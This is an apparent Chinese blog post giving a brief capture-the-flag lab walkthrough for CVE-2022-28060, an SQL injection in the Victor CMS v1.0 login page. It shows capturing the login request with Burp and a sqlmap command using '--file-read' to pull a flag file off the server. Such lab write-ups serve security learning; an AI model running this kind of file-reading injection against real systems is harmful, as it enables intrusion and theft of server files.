春秋云镜 CVE-2022-28060

春秋云镜 CVE-2022-28060

靶标介绍:

Victor CMS v1.0 /includes/login.php 存在sql注入

 

 1.打开环境之后进入该路径,看到一个登录界面

 

 2.尝试登录,并使用burp进行抓包

 

 3.将抓包的报文放到一个文件中

 

 4.使用sqlmap进行爆破

sqlmap -r 1.txt --file-read "/flag" --dbms mysql  

 

 

 

 捕获该地址

cat /home/wxm/.local/share/sqlmap/output/eci-2zeiq2tg2xj2vwdexjfu.cloudeci1.ichunqiu.com/files/_flag

 

 

 拿到flag

 

posted @ 2023-08-31 10:41  WuliweiT  阅读(154)  评论(0编辑  收藏  举报